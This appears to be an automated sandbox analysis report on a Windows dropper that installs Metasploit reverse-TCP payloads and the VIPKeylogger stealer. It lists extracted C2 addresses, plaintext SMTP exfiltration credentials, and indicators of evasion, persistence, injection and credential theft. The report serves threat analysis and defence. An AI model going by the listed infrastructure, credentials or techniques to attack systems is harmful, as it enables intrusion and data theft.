metasploit | 98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc

Analysis

max time kernel
959s
max time network
956s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
14-11-2024 23:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document.exe
Size

4KB
MD5

a239a27c2169af388d4f5be6b52f272c
SHA1

0feb9a0cd8c25f01d071e9b2cfc2ae7bd430318c
SHA256

98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
SHA512

f30e1ff506cc4d729f7e24aa46e832938a5e21497f1f82f1b300d47f45dae7f1caef032237ef1f5ae9001195c43c0103e3ab787f9196c8397846c1dea8f351da
SSDEEP

48:6r1huik0xzYGJZZJOQOulbfSqXSfbNtm:IIxcLpf6zNt

Score

10^/10

metasploit vipkeylogger backdoor collection discovery evasion execution keylogger persistence spyware stealer trojan upx

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_tcp

64.176.38.237:8139

64.176.38.237:443

Extracted

Family

vipkeylogger

Credentials

Protocol: smtp
Host:
mail.jhxkgroup.online
Port:
587
Username:
[email protected]
Password:
7213575aceACE@@
Email To:
[email protected]

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
stealer keylogger vipkeylogger
Vipkeylogger family
vipkeylogger

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	lum250.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	lum250.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4528	powershell.exe
2976	powershell.exe
696	powershell.exe
4764	powershell.exe
4360	powershell.exe
4528	powershell.exe
5052	powershell.exe
2288	powershell.exe
2976	powershell.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	lum250.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	lum250.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	lum250.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	lum250.exe

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe	curl.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe	curl.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sznj.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dcpz.lnk	powershell.exe

Executes dropped EXE 40 IoCs

pid	Process
1412	wwbizsrvs.exe
784	msf.exe
1944	msf443.exe
1868	client.exe
2556	xXdquUOrM1vD3An.exe
2828	op.exe
5008	installer.exe
2032	GenericSetup.exe
2628	xXdquUOrM1vD3An.exe
3220	xXdquUOrM1vD3An.exe
2840	xXdquUOrM1vD3An.exe
3356	wwbizsrvs.exe
3176	msf.exe
1832	msf443.exe
2744	client.exe
1716	xXdquUOrM1vD3An.exe
1200	op.exe
3124	installer.exe
2504	GenericSetup.exe
2672	babababa.exe
1272	decrypted_executable.exe
4132	lum250.exe
732	Beefy.exe
2120	solandra.exe
4348	mk.exe
1040	crypted2.exe
1788	crypted2.exe
1064	xXdquUOrM1vD3An.exe
3652	babababa.exe
4940	decrypted_executable.exe
2292	lum250.exe
4716	Beefy.exe
1444	solandra.exe
3300	mk.exe
4628	crypted2.exe
5076	crypted2.exe
2136	random.exe
3236	blhbZrtqbLg6O1K.exe
3232	enters.exe
4844	blhbZrtqbLg6O1K.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Wine	lum250.exe
Key opened	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Wine	lum250.exe

Loads dropped DLL 50 IoCs

pid	Process
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	xXdquUOrM1vD3An.exe
Key opened	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	xXdquUOrM1vD3An.exe
Key opened	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	blhbZrtqbLg6O1K.exe
Key opened	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	xXdquUOrM1vD3An.exe
Key opened	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	blhbZrtqbLg6O1K.exe
Key opened	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	blhbZrtqbLg6O1K.exe
Key opened	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	xXdquUOrM1vD3An.exe
Key opened	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	xXdquUOrM1vD3An.exe
Key opened	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	xXdquUOrM1vD3An.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Run\enters = "C:\\Users\\Admin\\AppData\\Local\\enters.exe"	random.exe

Checks for any installed AV software in registry 1 TTPs 16 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVG\AV\Dir	GenericSetup.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast	GenericSetup.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV\Dir	GenericSetup.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast\Version	GenericSetup.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast	GenericSetup.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV\Dir	GenericSetup.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	GenericSetup.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVG\AV	GenericSetup.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast\Version	GenericSetup.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	GenericSetup.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVG\AV\Dir	GenericSetup.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVG\AV	GenericSetup.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast\Version	GenericSetup.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	GenericSetup.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast\Version	GenericSetup.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	GenericSetup.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops desktop.ini file(s) 2 IoCs

description	ioc	Process
File created	C:\Windows\assembly\Desktop.ini	client.exe
File opened for modification	C:\Windows\assembly\Desktop.ini	client.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
22	checkip.dyndns.org
57	checkip.dyndns.org
57	ip-api.com

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4132	lum250.exe
2292	lum250.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 2556 set thread context of 2840	2556	xXdquUOrM1vD3An.exe	100
PID 1040 set thread context of 1788	1040	crypted2.exe	138
PID 1716 set thread context of 1064	1716	xXdquUOrM1vD3An.exe	144
PID 4628 set thread context of 5076	4628	crypted2.exe	159
PID 3236 set thread context of 4844	3236	blhbZrtqbLg6O1K.exe	175

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1272-464-0x0000000140000000-0x0000000140026000-memory.dmp	upx
behavioral1/memory/1272-504-0x0000000140000000-0x0000000140026000-memory.dmp	upx
behavioral1/memory/4940-569-0x0000000140000000-0x0000000140026000-memory.dmp	upx
behavioral1/memory/4940-634-0x0000000140000000-0x0000000140026000-memory.dmp	upx
behavioral1/memory/4940-645-0x0000000140000000-0x0000000140026000-memory.dmp	upx

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\assembly	client.exe
File created	C:\Windows\assembly\Desktop.ini	client.exe
File opened for modification	C:\Windows\assembly\Desktop.ini	client.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2812	1040	WerFault.exe	137
3804	4628	WerFault.exe	158

System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lum250.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	blhbZrtqbLg6O1K.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	crypted2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msf443.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xXdquUOrM1vD3An.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lum250.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	crypted2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Beefy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	crypted2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Beefy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	blhbZrtqbLg6O1K.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	crypted2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wwbizsrvs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xXdquUOrM1vD3An.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wwbizsrvs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	op.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xXdquUOrM1vD3An.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msf443.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xXdquUOrM1vD3An.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GenericSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	op.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GenericSetup.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3456	cmd.exe
3976	cmd.exe
764	PING.EXE

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	client.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	client.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	client.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
764	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1412	wwbizsrvs.exe
1412	wwbizsrvs.exe
1868	client.exe
5008	installer.exe
5008	installer.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2032	GenericSetup.exe
2556	xXdquUOrM1vD3An.exe
2556	xXdquUOrM1vD3An.exe
2556	xXdquUOrM1vD3An.exe
2556	xXdquUOrM1vD3An.exe
2840	xXdquUOrM1vD3An.exe
2288	powershell.exe
2288	powershell.exe
2840	xXdquUOrM1vD3An.exe
3356	wwbizsrvs.exe
3356	wwbizsrvs.exe
2744	client.exe
3124	installer.exe
3124	installer.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe
2504	GenericSetup.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	4864	New Text Document.exe
Token: SeBackupPrivilege	1412	wwbizsrvs.exe
Token: SeRestorePrivilege	1412	wwbizsrvs.exe
Token: SeDebugPrivilege	1868	client.exe
Token: SeDebugPrivilege	2032	GenericSetup.exe
Token: SeDebugPrivilege	2556	xXdquUOrM1vD3An.exe
Token: SeDebugPrivilege	2840	xXdquUOrM1vD3An.exe
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeDebugPrivilege	4680	New Text Document.exe
Token: SeBackupPrivilege	3356	wwbizsrvs.exe
Token: SeRestorePrivilege	3356	wwbizsrvs.exe
Token: SeDebugPrivilege	2744	client.exe
Token: SeDebugPrivilege	2504	GenericSetup.exe
Token: SeDebugPrivilege	2976	powershell.exe
Token: SeDebugPrivilege	1064	xXdquUOrM1vD3An.exe
Token: SeDebugPrivilege	4360	powershell.exe
Token: SeDebugPrivilege	4528	powershell.exe
Token: SeDebugPrivilege	696	powershell.exe
Token: SeDebugPrivilege	4844	blhbZrtqbLg6O1K.exe
Token: SeDebugPrivilege	5052	powershell.exe
Token: SeDebugPrivilege	4764	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2032	GenericSetup.exe
2504	GenericSetup.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4864 wrote to memory of 1412	4864	New Text Document.exe	82
PID 4864 wrote to memory of 1412	4864	New Text Document.exe	82
PID 4864 wrote to memory of 1412	4864	New Text Document.exe	82
PID 4864 wrote to memory of 784	4864	New Text Document.exe	83
PID 4864 wrote to memory of 784	4864	New Text Document.exe	83
PID 4864 wrote to memory of 784	4864	New Text Document.exe	83
PID 4864 wrote to memory of 1944	4864	New Text Document.exe	85
PID 4864 wrote to memory of 1944	4864	New Text Document.exe	85
PID 4864 wrote to memory of 1944	4864	New Text Document.exe	85
PID 4864 wrote to memory of 1868	4864	New Text Document.exe	87
PID 4864 wrote to memory of 1868	4864	New Text Document.exe	87
PID 4864 wrote to memory of 2556	4864	New Text Document.exe	89
PID 4864 wrote to memory of 2556	4864	New Text Document.exe	89
PID 4864 wrote to memory of 2556	4864	New Text Document.exe	89
PID 4864 wrote to memory of 2828	4864	New Text Document.exe	90
PID 4864 wrote to memory of 2828	4864	New Text Document.exe	90
PID 4864 wrote to memory of 2828	4864	New Text Document.exe	90
PID 2828 wrote to memory of 5008	2828	op.exe	91
PID 2828 wrote to memory of 5008	2828	op.exe	91
PID 2828 wrote to memory of 5008	2828	op.exe	91
PID 5008 wrote to memory of 2032	5008	installer.exe	93
PID 5008 wrote to memory of 2032	5008	installer.exe	93
PID 5008 wrote to memory of 2032	5008	installer.exe	93
PID 2556 wrote to memory of 2288	2556	xXdquUOrM1vD3An.exe	96
PID 2556 wrote to memory of 2288	2556	xXdquUOrM1vD3An.exe	96
PID 2556 wrote to memory of 2288	2556	xXdquUOrM1vD3An.exe	96
PID 2556 wrote to memory of 2628	2556	xXdquUOrM1vD3An.exe	97
PID 2556 wrote to memory of 2628	2556	xXdquUOrM1vD3An.exe	97
PID 2556 wrote to memory of 2628	2556	xXdquUOrM1vD3An.exe	97
PID 2556 wrote to memory of 3220	2556	xXdquUOrM1vD3An.exe	99
PID 2556 wrote to memory of 3220	2556	xXdquUOrM1vD3An.exe	99
PID 2556 wrote to memory of 3220	2556	xXdquUOrM1vD3An.exe	99
PID 2556 wrote to memory of 2840	2556	xXdquUOrM1vD3An.exe	100
PID 2556 wrote to memory of 2840	2556	xXdquUOrM1vD3An.exe	100
PID 2556 wrote to memory of 2840	2556	xXdquUOrM1vD3An.exe	100
PID 2556 wrote to memory of 2840	2556	xXdquUOrM1vD3An.exe	100
PID 2556 wrote to memory of 2840	2556	xXdquUOrM1vD3An.exe	100
PID 2556 wrote to memory of 2840	2556	xXdquUOrM1vD3An.exe	100
PID 2556 wrote to memory of 2840	2556	xXdquUOrM1vD3An.exe	100
PID 2556 wrote to memory of 2840	2556	xXdquUOrM1vD3An.exe	100
PID 1868 wrote to memory of 3560	1868	client.exe	105
PID 1868 wrote to memory of 3560	1868	client.exe	105
PID 3560 wrote to memory of 4388	3560	csc.exe	106
PID 3560 wrote to memory of 4388	3560	csc.exe	106
PID 4680 wrote to memory of 3356	4680	New Text Document.exe	112
PID 4680 wrote to memory of 3356	4680	New Text Document.exe	112
PID 4680 wrote to memory of 3356	4680	New Text Document.exe	112
PID 4680 wrote to memory of 3176	4680	New Text Document.exe	113
PID 4680 wrote to memory of 3176	4680	New Text Document.exe	113
PID 4680 wrote to memory of 3176	4680	New Text Document.exe	113
PID 4680 wrote to memory of 1832	4680	New Text Document.exe	115
PID 4680 wrote to memory of 1832	4680	New Text Document.exe	115
PID 4680 wrote to memory of 1832	4680	New Text Document.exe	115
PID 4680 wrote to memory of 2744	4680	New Text Document.exe	117
PID 4680 wrote to memory of 2744	4680	New Text Document.exe	117
PID 4680 wrote to memory of 1716	4680	New Text Document.exe	119
PID 4680 wrote to memory of 1716	4680	New Text Document.exe	119
PID 4680 wrote to memory of 1716	4680	New Text Document.exe	119
PID 4680 wrote to memory of 1200	4680	New Text Document.exe	121
PID 4680 wrote to memory of 1200	4680	New Text Document.exe	121
PID 4680 wrote to memory of 1200	4680	New Text Document.exe	121
PID 1200 wrote to memory of 3124	1200	op.exe	122
PID 1200 wrote to memory of 3124	1200	op.exe	122
PID 1200 wrote to memory of 3124	1200	op.exe	122

